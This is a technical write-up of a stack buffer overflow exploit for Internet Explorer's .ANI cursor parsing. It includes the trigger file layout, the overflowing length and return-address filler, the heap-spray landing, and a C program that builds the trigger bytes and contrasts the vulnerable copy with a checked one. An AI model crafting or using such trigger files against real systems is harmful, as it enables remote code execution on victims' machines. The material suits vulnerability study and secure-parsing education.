Internet Exploiter 3: Technical details
A vulnerability in the Windows .ANI (animated cursor) file handling was found and documented by eEye Digital Security. This vulnerability can be triggered remotely through Internet Explorer.
exploits/InternetExploiter3.2.zip consists of InternetExploiter3.2.html and InternetExploiter3.2.ani. The html file contains my standard exploit helper script (see the Internet Exploiter 1 documentation) and loads the ani file. The ani file contains the bare minimum an ani file needs to trigger the BoF:
"RIFF" [DWORD:RIFFChunkLength] "ACON" "anih" [DWORD:AnimationHeaderLength] [AnimationHeaderData] "IART" [DWORD:ArtistNameLength] [ArtistName]
- RIFFChunkLength is the total size of everything after it.
- AnimationHeaderLength is the field whose value triggers the BoF: the parser trusts it and copies that many bytes of the chunk onto the stack.
- AnimationHeaderData is the data that is written to the stack.
- ArtistNameLength is the length of the artist's name.
- ArtistName is "SkyLined".
By choosing too high a value for AnimationHeaderLength we can overwrite the stack with information from AnimationHeaderData: the stack buffer that receives the copy is sized for the animation header itself, which is only 36 (0x24) bytes, so everything beyond that lands on whatever follows it on the stack. In the PoC code I used 0xDC for AnimationHeaderLength, so 0xDC bytes of AnimationHeaderData are written to the stack. AnimationHeaderData contains a string of bytes with value 0x0D, which overwrites the saved return address on the stack with 0x0D0D0D0D. When the function returns, execution lands in the heap blocks created by the script in the html file.
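The layout and the overflow described above, as an added example that is not part of the original page or of SkyLined's exploit: the C below builds the minimal .ANI byte sequence from the layout above using the page's own values (AnimationHeaderLength 0xDC, 0x0D filler, artist "SkyLined"), then walks the chunks and shows the vulnerable pattern beside a checked one. The 36-byte size of the anih payload (the ANIHEADER, nine little-endian DWORDs) comes from the ANI format rather than from this page; the parser is a simplified model of the length-trusting copy, not the actual Windows code, and it reports the overrun instead of performing the unsafe copy. All input is constructed in the program, so it runs offline with any C99 compiler.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The real "anih" payload is an ANIHEADER: nine little-endian DWORDs, 36 bytes.
   The BoF is that the parser copies AnimationHeaderLength bytes into a stack
   area sized for exactly this header. */
#define ANIH_SIZE 36u

static void put_u32le(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

static uint32_t get_u32le(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Emit the minimal layout from the page:
   "RIFF" [RIFFChunkLength] "ACON" "anih" [anih_len] [anih_len bytes of fill]
   "IART" [ArtistNameLength] [ArtistName]
   Returns the total file size, or 0 if it does not fit in out[]. */
size_t build_ani(uint8_t *out, size_t cap, uint32_t anih_len, uint8_t fill,
                 const char *artist)
{
    uint32_t art_len = (uint32_t)strlen(artist);
    size_t total = 12 + 8 + (size_t)anih_len + 8 + art_len;
    uint8_t *p = out;

    if (total > cap)
        return 0;
    memcpy(p, "RIFF", 4);
    put_u32le(p + 4, (uint32_t)(total - 8));   /* everything after this DWORD */
    memcpy(p + 8, "ACON", 4);
    p += 12;
    memcpy(p, "anih", 4);
    put_u32le(p + 4, anih_len);                 /* the field that triggers the BoF */
    p += 8;
    memset(p, fill, anih_len);                  /* AnimationHeaderData */
    p += anih_len;
    memcpy(p, "IART", 4);
    put_u32le(p + 4, art_len);
    p += 8;
    memcpy(p, artist, art_len);
    return total;
}

/* Walk the RIFF chunks and locate "anih". Chunk lengths are checked against the
   file size so this demo never reads out of bounds; the page's bug is a different
   check (chunk length against the fixed header buffer), modelled below.
   Returns 0 on success, -1 on malformed input. */
int find_anih(const uint8_t *buf, size_t n, uint32_t *len_out,
              const uint8_t **data_out)
{
    size_t off = 12;

    if (n < 12 || memcmp(buf, "RIFF", 4) != 0 || memcmp(buf + 8, "ACON", 4) != 0)
        return -1;
    while (off + 8 <= n) {
        uint32_t clen = get_u32le(buf + off + 4);
        if (clen > n - off - 8)
            return -1;                 /* chunk claims more bytes than remain */
        if (memcmp(buf + off, "anih", 4) == 0) {
            *len_out = clen;
            *data_out = buf + off + 8;
            return 0;
        }
        off += 8 + clen;               /* real RIFF pads odd chunks; all even here */
    }
    return -1;
}

/* Vulnerable pattern: trust AnimationHeaderLength and copy that many bytes into
   the 36-byte header on the stack. Instead of doing the unsafe copy, report how
   many bytes would land past the end of the header (0 = in bounds). */
size_t anih_overflow_bytes(const uint8_t *buf, size_t n)
{
    uint32_t len; const uint8_t *data;
    if (find_anih(buf, n, &len, &data) != 0)
        return 0;
    return len > ANIH_SIZE ? len - ANIH_SIZE : 0;
}

/* The DWORD the overflow would write at byte offset `off` of the copy. With 0x0D
   filler every DWORD reads 0x0D0D0D0D, so the saved return address becomes that
   value wherever it sits in the overwritten region. */
uint32_t overwritten_dword(const uint8_t *buf, size_t n, size_t off)
{
    uint32_t len; const uint8_t *data;
    if (find_anih(buf, n, &len, &data) != 0 || off + 4 > len)
        return 0;
    return get_u32le(data + off);
}

/* Hardened pattern: the header has exactly one legal size; reject before copying. */
int load_anih_checked(const uint8_t *buf, size_t n, uint8_t hdr[ANIH_SIZE])
{
    uint32_t len; const uint8_t *data;
    if (find_anih(buf, n, &len, &data) != 0 || len != ANIH_SIZE)
        return -1;
    memcpy(hdr, data, ANIH_SIZE);
    return 0;
}

int main(void)
{
    uint8_t buf[512], hdr[ANIH_SIZE];
    size_t n = build_ani(buf, sizeof buf, 0xDC, 0x0D, "SkyLined");

    printf("%zu-byte .ani: anih copy overruns the %u-byte header by %zu bytes, "
           "return address would become 0x%08X, checked loader returns %d\n",
           n, ANIH_SIZE, anih_overflow_bytes(buf, n),
           overwritten_dword(buf, n, 0x40), load_anih_checked(buf, n, hdr));
    return 0;
}
```

The same builder with AnimationHeaderLength set to 36 produces a file the checked loader accepts and the overrun report gives 0 for, which is the whole difference between the two parsers: one comparison of the attacker-controlled length against the size of the destination before the copy.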
| Date | Event |
|---|---|
| 2004-11-01 | Patch released by Microsoft (available from the Microsoft Corporation website). |
| 2004-11-01 | Advisory released by eEye. |
| 2004-12-01 | Exploit v0.2 released. |
- Internet Exploiter 3: Remote exploit for Internet Explorer .ANI file Animation Header Length BoF vulnerability.
- Beta shellcode encoder: Documentation.
- beta.c C Source file for the current version of beta shellcode encoder.
- eEye: Windows ANI File Parsing Buffer Overflow.
- Secunia: Microsoft Internet Explorer Multiple Vulnerabilities.
- Microsoft Corporation website: Vulnerability in Cursor and Icon Format Handling Could Allow Remote Code Execution (891711).